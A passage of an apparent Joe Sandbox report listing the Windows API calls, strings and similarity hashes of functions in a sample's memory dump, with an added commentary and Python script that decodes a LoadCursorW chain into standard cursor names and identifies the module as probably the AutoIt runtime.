• LoadIconW.USER32(00000063), ref: 00B46395
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B463A7
• SetWindowTextW.USER32(?,?), ref: 00B463BE
• GetDlgItem.USER32(?,000003EA), ref: 00B463D3
• SetWindowTextW.USER32(00000000,?), ref: 00B463D9
• GetDlgItem.USER32(?,000003E9), ref: 00B463E9
• SetWindowTextW.USER32(00000000,?), ref: 00B463EF
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B46410
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B4642A
• GetWindowRect.USER32(?,?), ref: 00B46433
• _wcslen.LIBCMT ref: 00B4649A
• SetWindowTextW.USER32(?,?), ref: 00B464D6
• GetDesktopWindow.USER32 ref: 00B464DC
• GetWindowRect.USER32(00000000), ref: 00B464E3
• MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00B4653A
• GetClientRect.USER32(?,?), ref: 00B46547
• PostMessageW.USER32(?,00000005,00000000,?), ref: 00B4656C
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B46596
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
• String ID:
• API String ID: 895679908-0
• Opcode ID: 2383821017066db1ca3f72fb3fa4fc26197115f8a357632fa55a232aa1d2cfad
                                                                                                                                                                                                                                                                                    • Instruction ID: ba3a01fe17781e08d6de45be95c76acfd5bfd02dcb07b682e4bef8ed72de2e2b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2383821017066db1ca3f72fb3fa4fc26197115f8a357632fa55a232aa1d2cfad
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8718F31900609AFDB20DFA8CE85BAEBBF5FF48704F100558E586A36A0DB75EE44DB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00B60884
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00B6088F
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00B6089A
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00B608A5
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00B608B0
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00B608BB
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00B608C6
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00B608D1
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00B608DC
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00B608E7
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00B608F2
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00B608FD
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00B60908
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00B60913
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00B6091E
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00B60929
                                                                                                                                                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 00B60939
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B6097B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1f9edb23ac719dea84da344ead8bc75218fe8750c3714b0342c3c581819cbccb
                                                                                                                                                                                                                                                                                    • Instruction ID: 98a8c1ace08181aa71a6f4e9e5539a3e2eb058685b4731e2d797aafbde34b0c8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f9edb23ac719dea84da344ead8bc75218fe8750c3714b0342c3c581819cbccb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78415470D483196ADB10DFBA8C8585FBFE9FF04754B50456AE11CE7281DA78D901CF91
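The sixteen LoadCursorW calls in the function above all pass a NULL module handle and an ordinal between 0x7F00 and 0x7F8B; those are exactly the standard IDC_* cursor IDs from winuser.h (0x7F00 is IDC_ARROW, 0x7F89 is IDC_HAND, and so on), and they are followed by one GetCursorInfo. Loading every system cursor and then reading the live cursor handle is the usual way to identify the current cursor shape by handle comparison; on its own that is ordinary runtime functionality, not evidence of evasion. The order of the loads matches the cursor table of AutoIt's MouseGetCursor, and the CLASS/CLASSNN/INSTANCE/NAME/REGEXPCLASS/TEXT strings in a later function on this page are AutoIt's control descriptors, so this module is very probably the AutoIt runtime; that is an inference, not something the report states. The Python below is an added example and not part of the Joe Sandbox report: it parses API lines in the format the report uses, resolves the ordinals to names, and flags the load-all-then-query idiom. The sample lines are copied from the function above; the regex and function names are mine, and the ordering check relies on the report listing calls in address order.

```python
"""Decode a LoadCursorW/GetCursorInfo chain from Joe Sandbox 'APIs' lines."""
import re

# Standard cursor resource IDs from winuser.h (the MAKEINTRESOURCE ordinals).
IDC_NAMES = {
    0x7F00: "IDC_ARROW",    0x7F01: "IDC_IBEAM",    0x7F02: "IDC_WAIT",
    0x7F03: "IDC_CROSS",    0x7F04: "IDC_UPARROW",  0x7F80: "IDC_SIZE",
    0x7F81: "IDC_ICON",     0x7F82: "IDC_SIZENWSE", 0x7F83: "IDC_SIZENESW",
    0x7F84: "IDC_SIZEWE",   0x7F85: "IDC_SIZENS",   0x7F86: "IDC_SIZEALL",
    0x7F88: "IDC_NO",       0x7F89: "IDC_HAND",     0x7F8A: "IDC_APPSTARTING",
    0x7F8B: "IDC_HELP",
}

# One report line: "• Api.MODULE(arg,arg), ref: ADDR" or "• Api.MODULE ref: ADDR".
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)"          # API name and module
    r"(?:\((?P<args>[^)]*)\))?"            # optional argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"   # call-site address
)

# Constructed sample: the 18 API lines of the function above, copied from the report.
REPORT_LINES = """
• LoadCursorW.USER32(00000000,00007F89), ref: 00B60884
• LoadCursorW.USER32(00000000,00007F8A), ref: 00B6088F
• LoadCursorW.USER32(00000000,00007F00), ref: 00B6089A
• LoadCursorW.USER32(00000000,00007F03), ref: 00B608A5
• LoadCursorW.USER32(00000000,00007F8B), ref: 00B608B0
• LoadCursorW.USER32(00000000,00007F01), ref: 00B608BB
• LoadCursorW.USER32(00000000,00007F81), ref: 00B608C6
• LoadCursorW.USER32(00000000,00007F88), ref: 00B608D1
• LoadCursorW.USER32(00000000,00007F80), ref: 00B608DC
• LoadCursorW.USER32(00000000,00007F86), ref: 00B608E7
• LoadCursorW.USER32(00000000,00007F83), ref: 00B608F2
• LoadCursorW.USER32(00000000,00007F85), ref: 00B608FD
• LoadCursorW.USER32(00000000,00007F82), ref: 00B60908
• LoadCursorW.USER32(00000000,00007F84), ref: 00B60913
• LoadCursorW.USER32(00000000,00007F04), ref: 00B6091E
• LoadCursorW.USER32(00000000,00007F02), ref: 00B60929
• GetCursorInfo.USER32(?), ref: 00B60939
• GetLastError.KERNEL32 ref: 00B6097B
"""


def _hex(token):
    """Parse a report argument; unresolved arguments are printed as '?'."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def parse_api_lines(text):
    """Turn report lines into dicts of api, module, args (strings) and ref (int)."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        calls.append({"api": m.group("api"), "module": m.group("mod"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def decode_cursor_chain(calls):
    """Name each loaded cursor and decide whether the function enumerates the
    standard set and then queries the live cursor (shape identification)."""
    loaded = []  # (call-site address, label) in report order
    for c in calls:
        if c["api"] != "LoadCursorW" or len(c["args"]) < 2:
            continue
        hinst, name = (_hex(a) for a in c["args"][:2])
        if hinst is None or name is None:
            continue
        if hinst != 0:
            label = f"app resource {name:#x}"      # cursor from the caller's own module
        elif name > 0xFFFF:
            label = f"string name @{name:#x}"      # lpCursorName is a pointer, not an ordinal
        else:
            label = IDC_NAMES.get(name, f"unknown ordinal {name:#x}")
        loaded.append((c["ref"], label))
    names = [label for _, label in loaded]
    query_ref = next((c["ref"] for c in calls if c["api"] == "GetCursorInfo"), None)
    return {
        "loaded": names,
        "complete_standard_set": set(names) >= set(IDC_NAMES.values()),
        "queries_current_cursor": query_ref is not None,
        # Every load sits before the single GetCursorInfo: the classic pattern of
        # comparing CURSORINFO.hCursor against each preloaded handle.
        "shape_identification_idiom": (
            query_ref is not None and len(loaded) >= 2
            and all(ref < query_ref for ref, _ in loaded)
        ),
    }


if __name__ == "__main__":
    summary = decode_cursor_chain(parse_api_lines(REPORT_LINES))
    for key, value in summary.items():
        print(f"{key}: {value}")
```

Run stand-alone it lists the sixteen cursor names in load order and reports the idiom as matched. The nonzero-hInstance and pointer branches exist because LoadCursorW with an application module handle or a string name means a custom cursor, which this naming table must not mislabel.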
APIs
• __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00B00436
  • Part of subcall function 00B0045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00BB170C,00000FA0,606BE961,?,?,?,?,00B22733,000000FF), ref: 00B0048C
  • Part of subcall function 00B0045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00B22733,000000FF), ref: 00B00497
  • Part of subcall function 00B0045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00B22733,000000FF), ref: 00B004A8
  • Part of subcall function 00B0045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00B004BE
  • Part of subcall function 00B0045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B004CC
  • Part of subcall function 00B0045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B004DA
  • Part of subcall function 00B0045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B00505
  • Part of subcall function 00B0045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B00510
• ___scrt_fastfail.LIBCMT ref: 00B00457
  • Part of subcall function 00B00413: __onexit.LIBCMT ref: 00B00419
Strings
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B00492
• kernel32.dll, xrefs: 00B004A3
• WakeAllConditionVariable, xrefs: 00B004D2
• InitializeConditionVariable, xrefs: 00B004B8
• SleepConditionVariableCS, xrefs: 00B004C4
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
• String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 66158676-1714406822
• Opcode ID: 8dd4eeb90204b0cf1ce5323b578b5c3942ee2c3f49d1d48a7f7e7e3e326e223f
• Instruction ID: 4feb3753ee37b279ff6d042fbf0925661ce47133b6adaa593692cfe71d854f63
• Opcode Fuzzy Hash: 8dd4eeb90204b0cf1ce5323b578b5c3942ee2c3f49d1d48a7f7e7e3e326e223f
• Instruction Fuzzy Hash: A2212932A647046BD7103BA8AC56BA93BF4EF45BE1F4002A5F905A36E0DFB09C408B95
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _wcslen
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 176396367-1603158881
• Opcode ID: e21effe5376dcec2e288447984ad9d8acbffd09470ef3306277c2e7d8756156a
• Instruction ID: 11001a124aee6d6d00c107156ac9cb88348dfd0ff539c5327be52425c24a4916
• Opcode Fuzzy Hash: e21effe5376dcec2e288447984ad9d8acbffd09470ef3306277c2e7d8756156a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44E1D432E04516ABCB149FB4C8817EEBBF0FF14B10F1841A9E556E7250DB309F99A7A0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,00B7DCD0), ref: 00B54F6C
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B54F80
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B54FDE
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B55039
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B55084
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B550EC
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AFFD52: _wcslen.LIBCMT ref: 00AFFD5D
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00BA7C10,00000061), ref: 00B55188
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                    • Opcode ID: 7efc17e4edd2285912b0f288d2e4331d35789f5db50c2dc54f156a796e5eada2
                                                                                                                                                                                                                                                                                    • Instruction ID: 6a60c1915e831e8fbb78bfe1a2021352bff2787d9e05565cfe54c4dc7e4f71c7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7efc17e4edd2285912b0f288d2e4331d35789f5db50c2dc54f156a796e5eada2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FB106316087029FC320DF28C9A0B6AB7E5EF94766F54499DF99587291DB30D848CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6BBF8
                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B6BC10
                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B6BC34
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6BC60
                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B6BC74
                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B6BC96
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6BD92
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B50F4E: GetStdHandle.KERNEL32(000000F6), ref: 00B50F6D
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6BDAB
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6BDC6
                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B6BE16
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00B6BE67
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B6BE99
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B6BEAA
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B6BEBC
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B6BECE
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B6BF43
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 99bab6d856ba836fd2dd85bc7efbaf4fc80bdd38251c83239c4028aee42cb4f8
                                                                                                                                                                                                                                                                                    • Instruction ID: cf92e60b1b679e246767222bdb1c1e6c66934d2477edaff69fce624f447a9b7f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99bab6d856ba836fd2dd85bc7efbaf4fc80bdd38251c83239c4028aee42cb4f8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF18B715043409FCB14EF24C991B6ABBF5EF84310F18899DF9899B2A2CB35ED85CB52
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00B7DCD0), ref: 00B64B18
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B64B2A
                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00B7DCD0), ref: 00B64B4F
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00B7DCD0), ref: 00B64B9B
                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00B7DCD0), ref: 00B64C05
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000009), ref: 00B64CBF
                                                                                                                                                                                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B64D25
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00B64D4F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                    • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                    • Opcode ID: c82539f41a363a0686085f4b4477857d56154223c62333436711ff1c4d4628c5
                                                                                                                                                                                                                                                                                    • Instruction ID: 98583d1c94bac5d61c2bb4108af254705460e148d0eb0ae063988bf6d9fa31ae
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c82539f41a363a0686085f4b4477857d56154223c62333436711ff1c4d4628c5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA122971A00505EFDB14DF94C884EAEBBF5FF85314F248498E909AB261DB35ED46CBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00BB29C0), ref: 00B23F72
                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00BB29C0), ref: 00B24022
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00B24066
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00B2406F
                                                                                                                                                                                                                                                                                    • TrackPopupMenuEx.USER32(00BB29C0,00000000,?,00000000,00000000,00000000), ref: 00B24082
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B2408E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                    • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                    • Opcode ID: d5559930c7f2a6f91d9fa6916bdc7ca2cd2ef18700e00a710ea55d85c7b9dd44
                                                                                                                                                                                                                                                                                    • Instruction ID: b1b9f072e393efa93d6f88d514db7a08d8d2201751ce907f2ca6e309b872f9ab
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5559930c7f2a6f91d9fa6916bdc7ca2cd2ef18700e00a710ea55d85c7b9dd44
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E371E131604215BBEB219F29EC89FAABFF5FF04764F104246F618A61E0C7B5A950DB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,?), ref: 00B77823
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B77897
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B778B9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B778CC
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00B778ED
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AE0000,00000000), ref: 00B7791C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B77935
                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00B7794E
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B77955
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B7796D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B77985
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE2234: GetWindowLongW.USER32(?,000000EB), ref: 00AE2242
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
